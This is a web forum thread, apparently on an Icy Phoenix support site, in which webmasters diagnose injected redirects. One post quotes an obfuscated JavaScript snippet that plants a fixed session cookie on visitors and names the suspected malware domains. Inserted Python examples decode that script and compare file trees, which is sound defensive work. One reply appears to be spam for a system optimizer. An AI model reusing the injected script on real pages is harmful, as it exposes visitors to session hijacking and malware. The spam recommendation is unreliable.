Malware? Spyware? Help Please!


Subject: Malware? Spyware? Help Please!
Hey all,

When I open my website, and view my website code, I can see this above my website!
Does anybody know what files may be infected? Or how this could be placed on my website?

Thanks in advance...


Subject: Re: Malware? Spyware? Help Please!
Surely something like your host...

Subject: Re: Malware? Spyware? Help Please!
Damn... that's an injection that could be in any file.

Check common.php, auth.php, page_header.php, page_tail.php and all overall_header.tpl of your templates.

Can you please check in the access log to see which request has been used for that?

As Informpro states, it could also be a hosting issue, but we cannot be 100% sure until you have access to the log files of your server and check how the injection has been performed.

Please report here if you find something else.

I'll do my best to help you with this issue.

Subject: Re: Malware? Spyware? Help Please!
Mighty Gorgon wrote:
Damn... that's an injection that could be in any file.

Check common.php, auth.php, page_header.php, page_tail.php and all overall_header.tpl of your templates.

Can you please check in the access log to see which request has been used for that?

As Informpro states, it could also be a hosting issue, but we cannot be 100% sure until you have access to the log files of your server and check how the injection has been performed.

Please report here if you find something else.

I'll do my best to help you with this issue.

Hmm, the problem might be bigger than I thought... My whole website appears to be offline now. But, it could also mean I have to pay my yearly invoice hehe.
Would be bad if I lost all my data.

I figured out a part of the problem:
All .html files were indeed infected with weird kinds of code (at least, not standard in IP, and I did not insert that code).
What I did is:
- I searched all .html files (with the use of FileZilla) and deleted them.

But I could not get the first line removed. Yesterday, I checked the most common files:
- index files (not only index.php, but several index files were infected.)

Next, when you have removed them: do not forget to change your password!!

But, with the host, or just my website being offline, I cannot check those other files.

I read on the internet the iframe could indeed be in any file...
I will post here in what files it could be posted.

I'm getting two suspicious loadings while loading the website (DO NOT CLICK THE LINKS OR GO TO THE WEBSITE! SPAM/MALWARE sites!)
- Pescasearch.info & erapost.

I do not know how to check the access log, is that the one you see instantly when logged in to IP admin panel?

Will keep you all posted. I read on several blogs they have this problem currently on a lot of sites.
And with Google Chrome introducing the anti-malware/phishing windows, you would not want this insertion on your Icy phoenix!

Thanks for the information MG & Informpro; if you by any chance have some other ideas about which files could be infected, please let me know!

-OwnageWorld

Subject: Re: Malware? Spyware? Help Please!
Without having access to your files it is almost impossible for me to understand where the injection is.

Recently injections also use cookies to store their injections... so you should also clean your cookies and possibly change the name of the cookie in ACP.

Access log is not the one included in Icy Phoenix, as it is almost useless for identifying such kinds of issues. You need the APACHE ACCESS LOG; ask your provider for that. Do you have a rough idea of when the hacking was performed? That will be useful as well while looking at the logs.

Make a full backup (both DB and files) as soon as you can... that is really important.

Also recently, some new injections are performed at hosting level... so even if you are using software which is known to be secure, you may be injected.

Please provide further information as soon as you have it.

Thanks, and good luck.

Subject: Re: Malware? Spyware? Help Please!
I'm having similar attacks on my site these days, and I'm investigating how to stop them. My situation is a little bit different, because they are using cookies to infect the site, and not changing files or using SQL injection on the DB. All my files and DB are clean.
At this moment, the only thing that I thought is that the problem is on the server side, but my hosting still says that the issue is in the CMS (another site with IP on the same server is affected by the same problem). I think I'll change my hosting soon, but I continue to investigate, to know better if there is a way to stop this kind of attack, because it's very annoying to have an attack with a redirect without seeing any file changed!!! :|

The way they are using is simple: they intercept the site cookie with the session ID (I removed some numbers from the ID codes for security):
Code:
n_sess_id8c2f6bdc702ee928d7b9d0535d******www.mysite.it/1600138298854430031586317765440300******


and create another cookie using the ID session for another site:
Code:
red1makkahintro.com/15363916258944300316863196715440300******


and insert on pages (don't tell me how) a script similar to this:
Code:
<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>


to redirect whoever is visiting that page to a fake antivirus site, that contains a lot of malware ready to download onto the visitor's PC........
This is all I have gathered to understand this problem better, and I hope it can help some people who could have a similar issue, and MG, if he could try to block similar attacks in some way...........

I'll tell you any news when I have some.
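The escaped string in that script can be decoded to see exactly which cookie it plants. The following Python is an added example, not code from the thread: it takes the script quoted above (with the cookie value shown there), decodes the \xNN escapes and reports the cookie name, value and lifetime, which is what a defender would check when deciding whether the value is a fixed session ID being forced onto visitors.

```python
import re

# Script as posted in the thread above; the cookie value is the one shown there.
INJECTED_SCRIPT = r'''<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>'''


def decode_js_escapes(s):
    """Replace JavaScript \\xNN escapes with the characters they stand for."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def extract_cookie_assignment(script):
    """Join and decode the string literals concatenated into document.cookie."""
    m = re.search(r'document\.cookie\s*=\s*((?:"[^"]*"\s*\+?\s*)+)', script)
    if not m:
        return None
    return decode_js_escapes("".join(re.findall(r'"([^"]*)"', m.group(1))))


def parse_cookie(assignment):
    """Split 'name=value; attr; attr' into (name, value, [attrs])."""
    name, _, rest = assignment.partition("=")
    parts = [p.strip() for p in rest.split(";")]
    return name, parts[0], [p for p in parts[1:] if p]


def lifetime_hours(script):
    """Evaluate the millisecond product added to getTime() and return hours."""
    m = re.search(r"getTime\(\s*\)\s*\+\s*([\d*]+)", script)
    if not m:
        return None
    ms = 1
    for factor in m.group(1).split("*"):
        ms *= int(factor)
    return ms / 3_600_000


if __name__ == "__main__":
    name, value, attrs = parse_cookie(extract_cookie_assignment(INJECTED_SCRIPT))
    print(name, value, attrs, lifetime_hours(INJECTED_SCRIPT))
```

The decoded assignment is the forum's own n_sess_id cookie with a hard-coded 32-character value and a 12-hour expiry, which is why clearing cookies and renaming the cookie in the ACP is the sensible first response.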

Subject: Re: Malware? Spyware? Help Please!
Mighty Gorgon wrote:
Without having access to your files it is almost impossible for me to understand where the injection is.

Recently injections also use cookies to store their injections... so you should also clean your cookies and possibly change the name of the cookie in ACP.

Access log is not the one included in Icy Phoenix, as it is almost useless for identifying such kinds of issues. You need the APACHE ACCESS LOG; ask your provider for that. Do you have a rough idea of when the hacking was performed? That will be useful as well while looking at the logs.

Make a full backup (both DB and files) as soon as you can... that is really important.

Also recently, some new injections are performed at hosting level... so even if you are using software which is known to be secure, you may be injected.

Please provide further information as soon as you have it.

Thanks, and good luck.

Hey MG,

I got full access to my website again; my host told me I used 3x more bandwidth than in the 3 years before...
So that's weird too!

If you want, you can check all my files and have access to the FTP and whatever you need.
PM me or e-mail me if so!

I would like to solve this problem, and it would be great if we know what would be the infected files...

I checked almost around 90 files manually, which are the most common in IP, but I really don't know anymore...

Thanks in advance,


Stefan/ OwnageWorld

Subject: Re: Malware? Spyware? Help Please!
Check where the code injection is (template)

Subject: Re: Malware? Spyware? Help Please!
What I should do is, make a full backup of the site, and replace all files with a clean installation.

After having done that, keep a copy of the fresh files on your local PC, and if you get injected again, please download the full site and do a comparison with WinMerge to check which files have been modified.

I have no other clue now apart from the fact that some Icy Phoenix sites have been injected recently, but it seemed to be hosting related.
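One way to do that comparison without WinMerge, as an added Python example that is not from the thread: hash every file in the clean copy and in the downloaded live site and report what differs. The directory layout and file contents below are constructed sample data, not Icy Phoenix files.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def compare_trees(clean_root, live_root):
    """Return (modified, added, missing) relative paths of the live site against
    the clean copy. Edited templates or PHP land in 'modified'; dropped files
    such as stray .html pages land in 'added'."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    modified = sorted(p for p in clean if p in live and clean[p] != live[p])
    added = sorted(p for p in live if p not in clean)
    missing = sorted(p for p in clean if p not in live)
    return modified, added, missing


def build_demo():
    """Constructed sample: a clean install and a live copy with one edited
    template and one extra file. Contents are placeholders only."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    for root in (clean, live):
        (root / "templates").mkdir(parents=True)
        (root / "common.php").write_text("<?php // placeholder common.php\n")
        (root / "templates" / "overall_header.tpl").write_text("<html><head></head>\n")
    (live / "templates" / "overall_header.tpl").write_text(
        "<html><head><!-- placeholder for injected markup --></head>\n"
    )
    (live / "x.html").write_text("<!-- placeholder dropped file -->\n")
    return clean, live


if __name__ == "__main__":
    modified, added, missing = compare_trees(*build_demo())
    print("modified:", modified, "added:", added, "missing:", missing)
```

Run it against the fresh install and a full FTP download of the live site; anything in 'modified' or 'added' is where to look first, and the clean copy's hashes can be stored so the check can be repeated after the next incident.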

Subject: Re: Malware? Spyware? Help Please!
You need some good antispyware.
I have 1 good application installed on my system,
Advanced System Optimizer...,
along with an Antispyware it also has other Privacy Protection tools.
You should try this as it blocks the spyware before it can enter your system,
and will also clean the infections if any.
Why don't you try this...

Last edited by Mighty Gorgon on Sat 24 Jul, 2010 11:58; edited 1 time in total
Subject: Re: Malware? Spyware? Help Please!
My site hasn't been attacked yet, but it has increased its bandwidth consumption seriously due to some "Yandex" and "Infopath" bots... maybe the next Icy robots.txt should do something with them :roll:


Powered by Icy Phoenix based on phpBB